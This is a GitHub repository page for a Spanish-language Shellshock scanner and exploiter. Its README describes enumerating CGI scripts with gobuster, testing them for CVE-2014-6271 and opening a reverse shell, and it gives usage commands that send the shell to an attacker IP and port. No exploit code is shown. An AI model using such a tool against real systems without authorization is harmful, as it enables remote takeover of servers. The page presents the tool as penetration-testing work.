Skip to content

x3m1Sec/shellshock-scanner

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
README.md
README.md
 
 
shellshock-scanner.py
shellshock-scanner.py
 
 

Repository files navigation

Shellshock Scanner y Explotador

Este script de Python es una herramienta para detectar y explotar la vulnerabilidad Shellshock (CVE-2014-6271) en servidores web que utilizan scripts CGI.

Descripción

Shellshock es una vulnerabilidad crítica que afecta a la shell Bash y permite a un atacante ejecutar comandos arbitrarios a través de variables de entorno. Esta herramienta automatiza:

  • La detección de scripts CGI accesibles en el servidor objetivo
  • La verificación de vulnerabilidad Shellshock en cada script encontrado
  • La explotación para obtener una shell reversa

Requisitos

La herramienta requiere las siguientes dependencias:

  • Python 3
  • gobuster
  • curl
  • netcat (nc)

Instalación

# Clonar el repositorio
git clone https://github.com/usuario/shellshock-scanner.git
cd shellshock-scanner

# Hacer el script ejecutable
chmod +x shellshock_scanner.py

# Verificar dependencias (el script comprobará automáticamente)
sudo apt install gobuster curl netcat-traditional

El script verificará e instalará automáticamente las dependencias necesarias.

Uso

./shellshock_scanner.py -h

Puedes especificar un diccionario para gobuster, en caso de no hacerlo usará uno por defecto y si no lo encuentra usará una lista de palabras predefinida.

./shellshock_scanner.py --target 192.168.1.10 --attacker-ip 192.168.1.5 --attacker-port 4444 --wordlist /usr/share/wordlists/dirb/common.txt

Para probar un script CGI específico:

./shellshock_scanner.py --target 192.168.1.10 --attacker-ip 192.168.1.5 --cgi-script test.cgi

Proceso de funcionamiento

  1. Verificación de dependencias: El script comprueba e instala todas las herramientas necesarias.
  2. Enumeración: Utiliza gobuster para encontrar scripts CGI en el directorio /cgi-bin/ del servidor.
  3. Detección: Verifica la vulnerabilidad Shellshock en cada script encontrado.
  4. Explotación: Para los scripts vulnerables, intenta obtener una shell reversa.

Características adicionales

  • Creación automática de un wordlist básico si no se encuentra ninguno.
  • Múltiples payloads para aumentar las probabilidades de éxito.
  • Comprobación manual de scripts CGI específicos.

Consideraciones legales

Esta herramienta está diseñada únicamente para fines educativos y de pruebas de penetración autorizadas. El uso de esta herramienta contra sistemas sin permiso explícito es ilegal y puede resultar en consecuencias legales.

About

No description, website, or topics provided.

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages